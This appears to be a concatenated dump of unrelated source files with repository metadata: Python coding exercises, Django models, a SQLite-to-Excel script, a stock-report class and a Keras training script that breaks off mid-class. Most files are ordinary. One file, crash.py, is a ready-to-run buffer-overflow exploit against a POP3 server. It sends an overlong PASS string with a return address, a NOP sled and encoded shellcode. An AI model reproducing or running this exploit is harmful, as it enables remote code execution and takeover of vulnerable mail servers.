] | hoanghung_inpg@yahoo.com |
4e2544889d6384c182513730ca865bc6991cba8b | 039f2c747a9524daa1e45501ada5fb19bd5dd28f | /ARC072/ARC072e.py | 6c8323480dc2db7390ec0225789b19ad0f8a7a1e | [
"Unlicense"
] | permissive | yuto-moriizumi/AtCoder | 86dbb4f98fea627c68b5391bf0cc25bcce556b88 | 21acb489f1594bbb1cdc64fbf8421d876b5b476d | refs/heads/master | 2023-03-25T08:10:31.738457 | 2021-03-23T08:48:01 | 2021-03-23T08:48:01 | 242,283,632 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | #ARC072e
def main():
    """AtCoder ARC072 E scaffolding: fast input and a deep recursion
    limit are set up, but the solution body is not implemented yet."""
    import sys
    input=sys.stdin.readline
    sys.setrecursionlimit(10**6)
if __name__ == '__main__':
    main()
"kurvan1112@gmail.com"
] | kurvan1112@gmail.com |
78b5b9400c19ab5e66367450ac516988019f5938 | 426784c07a624f461f8da6657f658207b39bd2bb | /prob2.py | 3efc6677038ed22a8ffd35c6e772d05c99952b1d | [
"Giftware"
] | permissive | a-jennings/MIT6.00.1x-Pset4 | 4320162e02a46b15ec275daca44b568cc04eb9f1 | ea80d1b4b10de5589725fa99f3f9013122de29ad | refs/heads/master | 2020-12-02T23:54:55.360062 | 2017-07-07T18:53:12 | 2017-07-07T18:53:12 | 95,961,284 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 792 | py | def updateHand(hand, word):
"""
Assumes that 'hand' has all the letters in word.
In other words, this assumes that however many times
a letter appears in 'word', 'hand' has at least as
many of that letter in it.
Updates the hand: uses up the letters in the given word
and returns the new hand, without those letters in it.
Has no side effects: does not modify hand.
word: string
hand: dictionary (string -> int)
returns: dictionary (string -> int)
"""
string = hand.copy()
for char in word:
try:
string[char] -= 1
except KeyError:
string[char] = 0
return string
#Testing below
hand = {'a':1, 'q':1, 'l':2, 'm':1, 'u':1, 'i':1}
word = 'quail'
print(updateHand(hand,word))
| [
"andrew_jennings@ymail.com"
] | andrew_jennings@ymail.com |
a5c842cde04279f715099f22659e1036fe9fc592 | aced737167d197371846c04a30003d5ee5087b0a | /my_app/models.py | 99813378e375a6fff7ee3a85b3462fb2ec6ea6e4 | [] | no_license | VasantaVanan/BloodBank-Django | 76a04cf5addf355ed528415eafe1dd0f13658914 | 3cca263380446307d43762a294a97f33a353de60 | refs/heads/master | 2023-08-27T10:37:44.913672 | 2021-10-07T08:00:40 | 2021-10-07T08:00:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 291 | py | from django.db import models
# Create your models here.
class Doner(models.Model):
    """A blood donor record for the blood bank app.

    NOTE(review): the class name looks like a typo for "Donor"; renaming
    would require a schema migration, so it is only flagged here.
    """
    name = models.CharField(max_length=30)  # donor's full name
    blood_group = models.CharField(max_length=15)  # free-text blood group label
    age = models.IntegerField(default=18)  # defaults to 18 — presumably the minimum donation age; confirm
    address = models.TextField()
    contact_no = models.IntegerField()  # NOTE(review): IntegerField drops leading zeros — CharField is usually safer for phone numbers
| [
"vasantavanan.r.2018.cse@ritchennai.edu.in"
] | vasantavanan.r.2018.cse@ritchennai.edu.in |
ef2be261d2e628e655f60d7e4701b4548864f468 | ceacaece7d31ddc3927f1acf10b96acb871d4bff | /front_comments/urls.py | 68544a505149a871c58fe8d51619ffbd164e58ce | [] | no_license | degreework/Front | a1ae8b02de93fac48bbe1af3c3e533ebbad8814d | 34c35526c574538fbd6146582f6fa73983449605 | refs/heads/master | 2021-06-01T10:07:19.153564 | 2015-12-11T03:35:38 | 2015-12-11T03:35:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | from django.conf.urls import patterns, url
# URL routes for this app (old-style django.conf.urls.patterns syntax).
# NOTE(review): this module lives in front_comments but maps every route
# to front_users.views — confirm that is intentional.
urlpatterns = patterns('',
    url(r'^$', 'front_users.views.index', name='index'),
    url(r'^recoverPassword/$', 'front_users.views.recoverPassword', name='recoverPassword'),
    url(r'^changePassword/$', 'front_users.views.changePassword', name='changePassword'),
    url(r'^profile/$', 'front_users.views.profile', name='profile'),
    url(r'^settings/$', 'front_users.views.settings', name='settings'),
)
| [
"donberna-93@hotmail.com"
] | donberna-93@hotmail.com |
3804592230add3e1e8bfcc31cec67fc5bc25cbb9 | 21e74dc4bd4de29713027103dd3e8c416fd41c3d | /bufferover/crash.py | e8e478fe7278b8ca99e61495cd5e4ccd85836a22 | [] | no_license | trollzim/Curso | c2c905630635ef4fa50839dd9d0cdc9605f28f84 | 6b0cb930c855d02ce73cb2c6bf1e7350288122dc | refs/heads/master | 2021-01-24T03:12:38.523716 | 2018-02-25T22:13:37 | 2018-02-25T22:13:37 | 122,882,198 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,053 | py | #!/usr/bin/python
import socket,sys
buf = ""
buf += "\xbb\x4a\xf9\xd2\x38\xdb\xc7\xd9\x74\x24\xf4\x5e\x2b"
buf += "\xc9\xb1\x52\x83\xc6\x04\x31\x5e\x0e\x03\x14\xf7\x30"
buf += "\xcd\x54\xef\x37\x2e\xa4\xf0\x57\xa6\x41\xc1\x57\xdc"
buf += "\x02\x72\x68\x96\x46\x7f\x03\xfa\x72\xf4\x61\xd3\x75"
buf += "\xbd\xcc\x05\xb8\x3e\x7c\x75\xdb\xbc\x7f\xaa\x3b\xfc"
buf += "\x4f\xbf\x3a\x39\xad\x32\x6e\x92\xb9\xe1\x9e\x97\xf4"
buf += "\x39\x15\xeb\x19\x3a\xca\xbc\x18\x6b\x5d\xb6\x42\xab"
buf += "\x5c\x1b\xff\xe2\x46\x78\x3a\xbc\xfd\x4a\xb0\x3f\xd7"
buf += "\x82\x39\x93\x16\x2b\xc8\xed\x5f\x8c\x33\x98\xa9\xee"
buf += "\xce\x9b\x6e\x8c\x14\x29\x74\x36\xde\x89\x50\xc6\x33"
buf += "\x4f\x13\xc4\xf8\x1b\x7b\xc9\xff\xc8\xf0\xf5\x74\xef"
buf += "\xd6\x7f\xce\xd4\xf2\x24\x94\x75\xa3\x80\x7b\x89\xb3"
buf += "\x6a\x23\x2f\xb8\x87\x30\x42\xe3\xcf\xf5\x6f\x1b\x10"
buf += "\x92\xf8\x68\x22\x3d\x53\xe6\x0e\xb6\x7d\xf1\x71\xed"
buf += "\x3a\x6d\x8c\x0e\x3b\xa4\x4b\x5a\x6b\xde\x7a\xe3\xe0"
buf += "\x1e\x82\x36\xa6\x4e\x2c\xe9\x07\x3e\x8c\x59\xe0\x54"
buf += "\x03\x85\x10\x57\xc9\xae\xbb\xa2\x9a\x10\x93\xad\x5c"
buf += "\xf9\xe6\xad\x61\x42\x6f\x4b\x0b\xa4\x26\xc4\xa4\x5d"
buf += "\x63\x9e\x55\xa1\xb9\xdb\x56\x29\x4e\x1c\x18\xda\x3b"
buf += "\x0e\xcd\x2a\x76\x6c\x58\x34\xac\x18\x06\xa7\x2b\xd8"
buf += "\x41\xd4\xe3\x8f\x06\x2a\xfa\x45\xbb\x15\x54\x7b\x46"
buf += "\xc3\x9f\x3f\x9d\x30\x21\xbe\x50\x0c\x05\xd0\xac\x8d"
buf += "\x01\x84\x60\xd8\xdf\x72\xc7\xb2\x91\x2c\x91\x69\x78"
buf += "\xb8\x64\x42\xbb\xbe\x68\x8f\x4d\x5e\xd8\x66\x08\x61"
buf += "\xd5\xee\x9c\x1a\x0b\x8f\x63\xf1\x8f\xbf\x29\x5b\xb9"
buf += "\x57\xf4\x0e\xfb\x35\x07\xe5\x38\x40\x84\x0f\xc1\xb7"
buf += "\x94\x7a\xc4\xfc\x12\x97\xb4\x6d\xf7\x97\x6b\x8d\xd2"
bytes = "A"*2606 + "\x20\x10\xB4\x7C" + "\x90" * (390-351) + buf
#2606
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.1.5",110))
r = s.recv(1024)
print r
s.send("USER teste\r\n")
r=s.recv(1024)
print r
s.send("PASS "+bytes+"\r\n")
r=s.recv(1024)
print r
except:
print "Erro ao conectar"
| [
"trolljoker01@gmail.com"
] | trolljoker01@gmail.com |
db48875d910abc70a67192d5f64a6031d1d0a335 | 54d8a05e0238e96eb43e4893bacba024e490bf11 | /python-projects/algo_and_ds/find_kth_bit_leetcode1545.py | a428393836935d26f23aacb98f3719b4b22816fc | [] | no_license | infinite-Joy/programming-languages | 6ce05aa03afd7edeb0847c2cc952af72ad2db21e | 0dd3fdb679a0052d6d274d19040eadd06ae69cf6 | refs/heads/master | 2023-05-29T10:34:44.075626 | 2022-07-18T13:53:02 | 2022-07-18T13:53:02 | 30,753,185 | 3 | 5 | null | 2023-05-22T21:54:46 | 2015-02-13T11:14:25 | Jupyter Notebook | UTF-8 | Python | false | false | 1,324 | py | """
https://leetcode.com/contest/weekly-contest-201/problems/find-kth-bit-in-nth-binary-string/
S1 = "0"
Si = Si-1 + "1" + reverse(invert(Si-1)) for i > 1
0
0 1 1
011 1 001
0111001 1 0110001
time complexity : k.log(fac(k))
num = 0, size = 1
k = 2, num << size + 1 + 1 <1 + , size = size*2 + 1 = 3
k = 3, num << size +1 + 1 << size + (~num), size = size * 2 + 1 = 7
finally once full k is reached. find the nth bit, num >> (n-1), num & 1
"""
from math import log
def reverse(n):
rev = 0
while n > 0:
rev = rev << 1
if n & 1 == 1:
rev ^= 1
n = n >> 1
return rev
def invert(n):
bits = int(log(n, 2)) + 1
ones = 2 ** bits - 1
return n ^ ones
def print_bin(val):
print(bin(val))
def main(n, k):
num = 0b0
size = 1
i = 1
while i < n:
prev = num << (size + 1)
print_bin(prev)
middle = 1 << size
print_bin(middle)
if num > 0:
last = invert(reverse(num)) << 1
last = last + 1
else:
last = 1
print_bin(last)
num = prev + middle + last
i += 1
size = 2 * size + 1
print(bin(num))
print("%"*10)
val = num >> (size - k)
return val & 1
print(main(3, 1))
print(main(4, 11))
print(main(1, 1))
print(main(2, 3))
| [
"joydeepubuntu@gmail.com"
] | joydeepubuntu@gmail.com |
3c209b9c3051bc6907a42ee90b048a14513b0d2a | 5f89f95fabb7a9d41d023ac1e7451fbf74c57c15 | /Fonctionnels/Méthodes prédéfinies !/Logging (3).py | c548aa5a2010d7c6b69e7718606165cf46d69d6f | [] | no_license | MINCARELLI13/Fonctionnels | 4ed5f439dae3032d5941eb0a61706ca472dd6a3c | d074c56bac0beebd118c525777e53be7035fd09a | refs/heads/master | 2023-03-08T21:43:02.290575 | 2021-02-28T21:49:38 | 2021-02-28T21:49:38 | 343,183,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 593 | py | # -*- coding: utf8 -*-
#!/usr/bin/python
import logging
# Le but du module "logging" est de remplacer le fameux teste "print("...")" mais en étant plus précis
# Pour cela, il y a 5 niveaux de messages : Debug, Info, Warning, Error, Critical
# on configure le module pour qu'il affiche tous les messages à partir de "Debug"
# (par défaut, il n'affiche rien en-dessous de "Warning")
logging.basicConfig(level=logging.DEBUG)
logging.warning("coin") # on affiche le résultat "coin" mais en mode "Warning"
logging.debug("pan !") # on affiche le résultat "pan !" en mode "Debug" | [
"sancho.poncho@laposte.net"
] | sancho.poncho@laposte.net |
2e6a81b0bc27a5aceceef63f2ba3c6c6c0db7f9f | b4eccda5955c2efb70a079a935db7e1d1e47bd72 | /build/mbot_navigation_gazebo/catkin_generated/pkg.develspace.context.pc.py | 22f32bce07f4460e26379c71d863fc6af4a1e49f | [] | no_license | huangyouhua/mc_ws | afc173571299ca50dba5f795d59b623a8dcd12a1 | 2262978fbab6e735270dc52ee36b22b9f6a3bcf7 | refs/heads/master | 2021-02-23T05:19:48.914956 | 2020-12-10T08:32:11 | 2020-12-10T08:32:11 | 245,393,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 377 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "mbot_navigation_gazebo"
PROJECT_SPACE_DIR = "/home/hyh/mc_ws/devel"
PROJECT_VERSION = "0.0.0"
| [
"1356795413@qq.com"
] | 1356795413@qq.com |
6e5f3bdcc012780b0112dbd48d8ab276bc348448 | 6206ad73052b5ff1b6690c225f000f9c31aa4ff7 | /Code/Design In-Memory File System.py | 9f880f3a935944388209a4752ec45afd1d1d48dd | [] | no_license | mws19901118/Leetcode | 7f9e3694cb8f0937d82b6e1e12127ce5073f4df0 | 752ac00bea40be1e3794d80aa7b2be58c0a548f6 | refs/heads/master | 2023-09-01T10:35:52.389899 | 2023-09-01T03:37:22 | 2023-09-01T03:37:22 | 21,467,719 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,458 | py | class TreeNode: #Tree node to store file or directory.
def __init__(self, isFile: bool):
self.content = "" if isFile else None #Content is empty string initially if node is file; otherwise is none.
self.children = None if isFile else {} #Children is empty dictionary initially if not is directory; otherwise is none.
class FileSystem:
def __init__(self): #Initialize root for file system tree.
self.root = TreeNode(False)
def ls(self, path: str) -> List[str]:
segments = self.parse(path) #Parse path.
node = self.root
for x in segments: #Traverse file system tree to find the last node of path.
node = node.children[x]
return [segments[-1]] if node.content else sorted(node.children.keys()) #Return the file name as list if node is file; otherwise, return the sorted keys in children.
def mkdir(self, path: str) -> None:
segments = self.parse(path) #Parse path.
node = self.root
for x in segments: #Traverse file system tree.
if x not in node.children: #If current directory not exist, create it.
node.children[x] = TreeNode(False)
node = node.children[x]
def addContentToFile(self, filePath: str, content: str) -> None:
segments = self.parse(filePath) #Parse filePath.
node = self.root
for x in segments[:-1]: #Traverse file system tree to find the parent directory of file.
node = node.children[x]
if segments[-1] not in node.children: #If file not exist, create a file node at the filePath.
node.children[segments[-1]] = TreeNode(True)
node.children[segments[-1]].content += content #Append content to file.
def readContentFromFile(self, filePath: str) -> str:
segments = self.parse(filePath) #Parse filePath.
node = self.root #Traverse file system tree to find file.
for x in segments:
node = node.children[x]
return node.content #Return content.
def parse(self, path: str) -> List[str]: #Parse the path to segements.
return [] if path == "/" else path.split('/')[1:] #If path is root, return empty list; otherwise, return path.split('/')[1:].
# Your FileSystem object will be instantiated and called as such:
# obj = FileSystem()
# param_1 = obj.ls(path)
# obj.mkdir(path)
# obj.addContentToFile(filePath,content)
# param_4 = obj.readContentFromFile(filePath)
| [
"noreply@github.com"
] | mws19901118.noreply@github.com |
4aa007b29f67e4b0976b53dd51de2d33c3362154 | 524f1a38c7316d88801d3ec40e00ffba44785ca5 | /fdep/__init__.py | 8694da177bebdaa37c421ab66f253f19ba55edf4 | [
"MIT"
] | permissive | checkr/fdep | e6bc6ce2b631f1d69c58f4b7ad02b4170a0af3bb | 36fba98e6b3af35adf238c61f700a8138c090a5e | refs/heads/master | 2021-01-19T11:32:28.673210 | 2019-10-30T02:16:03 | 2019-10-30T02:16:03 | 69,920,017 | 9 | 0 | MIT | 2019-10-30T02:16:05 | 2016-10-03T23:40:01 | Python | UTF-8 | Python | false | false | 22 | py | __VERSION__ = '0.2.9'
| [
"noreply@github.com"
] | checkr.noreply@github.com |
3e2ac1d8435684f35ad6bf1ceb0da06711ba9eb3 | 950872a24638b20e4e131f50666d416b3efd4e71 | /makevue/__init__.py | 54a8a8e69c52eb3c4a188c545af1eebe82be6522 | [] | no_license | lleej/django-study | 1cffea877e2a37ffd8d601958450c5f48023dbf1 | 76b1f628f9a81eb28e8b49b07be8cd42745363bf | refs/heads/master | 2020-07-05T16:34:09.770409 | 2019-08-21T00:47:23 | 2019-08-21T00:47:23 | 202,700,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 50 | py | __AUTHOR__ = 'lleej@qq.com'
__VERSION__ = '1.0.0'
| [
"lijie@boco.com.cn"
] | lijie@boco.com.cn |
f4372a6ec8497939240a4ac5878e45b079536c9f | fa124fdbf36327bf8e74bbc7f00ce448c1e7939a | /src/com/rwanda/mch/model/stock.py | 9a01b8acc42e78dc4aa3c40a04ad5e93b1f0e7c6 | [] | no_license | pivotaccess2007/mch | 039f17cdb16b434c0a25504cc81b7db81e5da988 | 523d1cd706296744e17e85683b5dbedbc05dd9e6 | refs/heads/master | 2020-03-30T16:33:44.451275 | 2018-10-03T13:23:00 | 2018-10-03T13:23:00 | 151,414,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,547 | py | #!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
##
##
## @author UWANTWALI ZIGAMA Didier
## d.zigama@pivotaccess.com/zigdidier@gmail.com
##
__author__="Zigama Didier"
__date__ ="$Nov 22, 2017 1:29:30 PM$"
from model.rsmsrwobj import RSMSRWObj
from util.record import fetch_summary, fetch_table, fetch_table_by_location, filter_data, fetch_report, fetch_resource, migrate
from exception.mch_critical_error import MchCriticalError
from service.stock.metrics import DRUGS
from util.mch_util import parse_codes
class Stock(RSMSRWObj):
    """A RapidSMS stock report backed by the `stock` table.

    Instances only carry the reporter's telephone number; all querying is
    done through the static helpers, which delegate to the util.record
    fetch functions imported at module level.
    """

    _table = 'stock'

    def __init__(self, telephone):
        """Return a stock object whose telephone is *telephone*."""
        self.telephone = telephone
        self.table = Stock._table

    @staticmethod
    def fetch_stock(cnds, cols, exts):
        # Aggregate summary over the stock table (conditions, columns, extras).
        return fetch_summary(Stock._table, cnds, cols, exts)

    @staticmethod
    def fetch_log_stock(cnds, cols):
        # Raw rows from the stock table matching `cnds`.
        return fetch_table(Stock._table, cnds, cols)

    @staticmethod
    def fetch_stock_by_location(cnds, group_by = [], INDICS = []):
        # Per-location counts, one result set per indicator in INDICS.
        # Each INDIC is a pair (alias, column); the special column 'total'
        # counts all rows.  NOTE(review): mutable default arguments are
        # shared across calls — safe only while callers never mutate them.
        data = []; print cnds, group_by, INDICS  # leftover debug print
        for INDIC in INDICS:
            #print "CNDS: ", cnds
            cols = group_by + ['COUNT (*) AS %s' % INDIC[0]]
            curr_cnds = {INDIC[1]: ''}
            if INDIC[1] == 'total':
                cols = group_by + ['COUNT (*) AS %s' % INDIC[0]]
                curr_cnds = {}
            curr_cnds.update(cnds)
            #print cols
            data.append(fetch_table_by_location(Stock._table, curr_cnds, cols, group_by))
        return data

    @staticmethod
    def get_report_drugs(pk):
        """Render the drug codes of report `pk` as a string ("" on error)."""
        message = ""
        try:
            record = fetch_report(Stock._table, pk)
            report = fetch_resource(code = record.keyword)
            message = parse_codes(report, record, CODES = DRUGS)
        except Exception,e :
            #print e
            # NOTE(review): all errors are swallowed; callers just get "".
            pass
        return message

    @staticmethod
    def get_report_details(pk):
        """Return the raw message text of report `pk` ("" on any error)."""
        message = ""
        try:
            record = fetch_report(Stock._table, pk)
            return record.message
            # NOTE(review): everything below the early return above is
            # unreachable — confirm whether the formatted variant was
            # meant to be removed or restored.
            report = fetch_resource(code = record.keyword)
            message = "Report: %(keyword)s, DRUGS: %(drugs)s" % {'keyword': record.keyword,
                              'drugs': parse_codes(report, record, CODES = DRUGS)}
        except Exception,e :
            #print e
            pass
        return message
| [
"zigdidier@gmail.com"
] | zigdidier@gmail.com |
2a72fdb2b9ab42a9a56b66989676e31153d5bacc | 64b2a2771f60defc930e848c3579b44c8de31a12 | /excel_temp.py | 39a41758f0eef5e1782e07aa6b22f89d04c1cb2d | [] | no_license | GemjuSherpa/Asignment | 220fbcff25dbcbe85ec5f395cc67b71dde0d0cbe | da18ceb3c81453dbd202aadd67d6f9c47365c979 | refs/heads/master | 2020-04-13T01:19:04.581451 | 2018-01-12T14:26:24 | 2018-01-12T14:26:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,347 | py | # #!/bin/Python
# Filename: excel_temp.py
# Author: Gemju Sherpa
#
# Read per-city temperature rows for China from an SQLite database, compute
# the mean temperature per year, and write (year, mean, city) rows to xlsx.
import openpyxl
import sqlite3
# Sqlite3: connect to db and query the result.
connection = sqlite3.connect("globaltemperature.db")
cursor = connection.cursor()
sql = """
SELECT City, STRFTIME('%Y', Date), Average_Temp
FROM Bycity
WHERE Country = 'China'
ORDER BY STRFTIME('%Y', Date);
"""
cursor.execute(sql)
rows = cursor.fetchall()  # [(city, year, temp), ...]
# Column-wise views of the result set.
year = [r[1] for r in rows]  # year strings
temp = [r[2] for r in rows]  # temperature values (may be the string "None")
city = [r[0] for r in rows]  # city names
# Group temperatures by year: {year: [temp, temp, ...]}.
d = {}
for k, v in zip(year, temp):
    d.setdefault(k, []).append(v)
keys = []    # distinct years, in dict iteration order
values = []  # matching lists of raw temperature readings
for k, v in d.items():
    keys.append(k)
    values.append(v)
# Convert to floats, dropping the textual "None" placeholders.
valuesfloat = [[float(i) for i in j if i != "None"] for j in values]
# BUGFIX: the mean of a year's readings must divide by the number of readings
# in that year (len(value)), not by the number of years (len(valuesfloat)).
mean = []
for value in valuesfloat:
    mean.append(sum(value) / len(value) if value else 0.0)
year_mean = dict(zip(keys, mean))  # {year: mean temperature}
# BUGFIX: the original `dict(zip(keys, city))` paired the i-th distinct year
# with the i-th result row, which is meaningless and truncates.  Map each
# year to the first city recorded for it instead.
city_year = {}
for y, c in zip(year, city):
    city_year.setdefault(y, c)
# Merge the two mappings: {year: [mean, city]}.
d2 = {}
for key in set(year_mean.keys()):
    if key in year_mean:
        d2.setdefault(key, []).append(year_mean[key])
    if key in city_year:
        d2.setdefault(key, []).append(city_year[key])
## Now, create a workbook and worksheet and save the data from d2
wb = openpyxl.Workbook()
sheet = wb.create_sheet('Temperature By City', 0)
# sheet header
sheet.cell(column=1, row=1, value='Year')
sheet.cell(column=2, row=1, value='Mean_Temperature')
sheet.cell(column=3, row=1, value='City')
# One row per year: year, mean temperature, city.  (The original rewrote the
# same row once per accumulated value — accidental O(n^2) with no effect on
# the final cells; this writes each row exactly once.)
next_row = 2
for key, value in d2.items():
    sheet.cell(column=1, row=next_row, value=key)
    sheet.cell(column=2, row=next_row, value=value[0])
    sheet.cell(column=3, row=next_row, value=value[1])
    next_row += 1
wb.save('World Temperature.xlsx')  # Save the result to workbook
wb.close()  # close workbook
| [
"gemju@github.com"
] | gemju@github.com |
1a606f42247d6ed08a5d7c4a7ac70c712737c38a | b9aabb13870b3707609fd2ea117870c2ad40c14b | /apps/accl_trn/03_trn_cnt.py | fea526ddb052242d3c8b61249c89bf799617e30f | [] | no_license | adpartin/pilot1 | d88d2af7d15df68780ab2f82169897a9c388a2fd | c99f32052fab0de210fd200b43194b19088dc3a7 | refs/heads/master | 2023-04-14T22:30:33.339975 | 2023-04-10T23:36:34 | 2023-04-10T23:36:34 | 160,101,290 | 1 | 0 | null | 2022-12-08T02:59:53 | 2018-12-02T22:10:10 | Jupyter Notebook | UTF-8 | Python | false | false | 14,014 | py | from __future__ import print_function, division
import warnings
warnings.filterwarnings('ignore')
# from comet_ml import Experiment
import os
import sys
from pathlib import Path
import argparse
import datetime
from time import time
from pprint import pprint
from glob import glob
import sklearn
import numpy as np
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import keras as ke
from keras import backend as K
from keras.models import Sequential, Model, model_from_json, model_from_yaml, load_model
from keras.optimizers import SGD, Adam, RMSprop, Adadelta
from keras.utils import np_utils, multi_gpu_model
from keras.callbacks import Callback, ModelCheckpoint, CSVLogger, ReduceLROnPlateau, EarlyStopping
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split
from sklearn.model_selection import ShuffleSplit, KFold
from sklearn.model_selection import GroupShuffleSplit, GroupKFold
from sklearn.model_selection import StratifiedShuffleSplit, StratifiedKFold
# ---------------------------------------------------------------------------
# Script-level configuration: constants, project-local imports, CLI arguments.
# ---------------------------------------------------------------------------
SEED = None  # RNG seed for data shuffling (None -> non-deterministic)
t_start = time()  # wall-clock start, reported at the end of the run
# Utils
import ml_models
from ml_models import r2_krs
import classlogger
import utils
# Import custom callbacks
# NOTE(review): hard-coded absolute path to a keras-contrib checkout; only
# works on the original author's machine — TODO make configurable.
keras_contrib = '/vol/ml/apartin/projects/keras-contrib/keras_contrib/callbacks'
sys.path.append(keras_contrib)
from cyclical_learning_rate import CyclicLR
# Warm-up epoch counts to evaluate (earlier experiments kept for reference).
# ep_vec = [int(x) for x in np.linspace(25, 175, 7)]
# ep_vec = [280, 240, 200, 160, 120, 80, 40]
# ep_vec = [300, 250, 200, 150, 100, 50]
ep_vec = [300, 200, 100]
# File path
# file_path = os.path.dirname(os.path.realpath(__file__))
file_path = Path(__file__).resolve().parent
# Path - create dir to dump results (AP)
PRJ_NAME = file_path.name
PRJ_DIR = file_path / '../../out' / PRJ_NAME
DATADIR = PRJ_DIR / 'data'
# Arg parser
psr = argparse.ArgumentParser(description='input agg csv file')
psr.add_argument('--ep', type=int, default=350, help='Total number of epochs.')
psr.add_argument('--attn', action='store_true', default=False, help='Whether to use attention layer.')
psr.add_argument('--split_by', type=str, choices=['cell', 'drug', 'both', 'none'],
                 default='cell',
                 help='Specify how to disjointly partition the dataset: \
                 `cell` (disjoint on cell), `drug` (disjoint on drug), \
                 `both` (disjoint on cell and drug), `none` (random split).')
# psr.add_argument('--ref_ep', type=int, default=350, help='Reference epoch.')
psr.add_argument('--ref_met', type=str, choices=['val_loss', 'val_mean_absolute_error'],
                 default='val_mean_absolute_error', help='Reference metric.')
psr.add_argument('--batch', type=int, default=32)
psr.add_argument('--dr', type=float, default=0.2)
psr.add_argument('--skp_ep', type=int, default=10, help='Number of epochs to skip when plotting training curves.')
psr.add_argument('--base_clr', type=float, default=1e-4, help='Base learning rate for cyclical learning rate.')
psr.add_argument('--max_clr', type=float, default=1e-3, help='Max learning rate for cyclical learning rate.')
args = vars(psr.parse_args())
pprint(args)
# Args
# Unpack parsed CLI arguments into module-level names.
EPOCH = args['ep']
BATCH = args['batch']
DR = args['dr']
attn = args['attn'] # bool(args['attn'])
split_by = args['split_by']
# ref_ep = args['ref_ep']
ref_metric = args['ref_met']
skp_ep = args['skp_ep']
base_clr = args['base_clr']
max_clr = args['max_clr']
tr_phase = 'cnt'  # training-phase tag: 'cnt' = continue-training
# Network-type tag used in output directory names.
if attn is True:
    nn_type = 'attn'
else:
    nn_type = 'fc'
# Path and outdir
# Directory layout: wrm* holds the warmed-up models, ref* the reference run.
wrmdir = PRJ_DIR / ('wrm' + '_' + nn_type) / ('split_by_' + split_by)
refdir = PRJ_DIR / ('ref' + '_' + nn_type) / ('split_by_' + split_by)
# data_path_tr = refdir / 'df_tr.parquet'
# data_path_te = refdir / 'df_te.parquet'
data_path_tr = DATADIR / ('split_by_' + split_by) / 'df_ref_tr.parquet'
data_path_te = DATADIR / ('split_by_' + split_by) / 'df_ref_te.parquet'
# outdir = PRJ_DIR / (tr_phase + '_' + nn_type + '_' + ref_metric) / ('split_by_' + split_by)
outdir = PRJ_DIR / (tr_phase + '_' + nn_type) / ('split_by_' + split_by)
os.makedirs(outdir, exist_ok=True)
# Dump args
utils.dump_args(args, outdir=outdir)
# Plot WRM vd REF curves
# Compare warm-up vs reference training histories for every val_* metric.
h_wrm = pd.read_csv(wrmdir/'krs_history.csv')
h_ref = pd.read_csv(refdir/'krs_history.csv')
val_cols_names = [c for c in h_ref.columns if 'val_' in c]
for c in val_cols_names:
    fig, ax = plt.subplots()
    # Skip the first skp_ep epochs so early transients don't dominate the plot.
    ax.plot(h_ref['epoch'][skp_ep:], h_ref[c][skp_ep:], label=c+'_ref')
    ax.plot(h_wrm['epoch'][skp_ep:], h_wrm[c][skp_ep:], label=c+'_wrm')
    ax.set_xlabel('epoch')
    ax.set_ylabel(c)
    plt.legend(loc='best')
    plt.grid(True)
    plt.savefig(outdir/f'ref_vs_wrm_{c}.png', bbox_inches='tight')
# Number of training epochs of ref model
ref_ep = h_ref.shape[0]
# Create logger
logfilename = outdir/'logfile.log'
lg = classlogger.Logger(logfilename=logfilename)
# ---------
# Load data
# ---------
# We'll use the same data that was used to train the reference model
def load_data_prqt(data_path):
    """Load a parquet file into a DataFrame and shuffle its rows (seeded by SEED)."""
    frame = pd.read_parquet(data_path, engine='auto', columns=None)
    return frame.sample(frac=1.0, axis=0, random_state=SEED)
# Load the train/test splits, scale features with the warm-up scaler, and
# derive the reference score that continued training must reach.
df_tr = load_data_prqt(data_path=data_path_tr)
df_te = load_data_prqt(data_path=data_path_te)
lg.logger.info('df_tr.shape: {}'.format(df_tr.shape))
lg.logger.info('df_te.shape: {}'.format(df_te.shape))
# Extract target and features
# Column 0 is the regression target; the remaining columns are features.
ytr, xtr = df_tr.iloc[:, 0], df_tr.iloc[:, 1:];
yte, xte = df_te.iloc[:, 0], df_te.iloc[:, 1:];
# Scale (use the scaler from the warm-up model)
scaler_path = wrmdir/'scaler.pkl'
scaler = joblib.load(scaler_path)
xtr = pd.DataFrame( scaler.transform(xtr) ).astype(np.float32)
xte = pd.DataFrame( scaler.transform(xte) ).astype(np.float32)
joblib.dump(scaler, outdir/'scaler.pkl')
# -----------------
# Get the ref score
# -----------------
# aa = pd.read_csv(refdir/'model.ref.log')
# score_ref = aa.loc[ref_ep-1, ref_metric]
# score_ref = aa[ref_metric].min()
# lg.logger.info(f'\n{ref_metric} at ref epoch {ref_ep}: {score_ref}')
x = h_ref[ref_metric].min()
# NOTE(review): x is already a scalar after .min(); the x.min() below relies
# on numpy scalars exposing .min() — harmless but redundant.
lg.logger.info(f'\n{ref_metric} (min): {x.min()}')
# Target score: best reference value relaxed by prct_diff percent.
prct_diff = 2
score_ref = x + x * prct_diff/100
lg.logger.info(f'{ref_metric} ({prct_diff}% from min): {score_ref}')
# ----------------------
# Train 'continue' model
# ----------------------
# Custom callback to stop training after reaching a target val_loss
class EarlyStoppingByMetric(Callback):
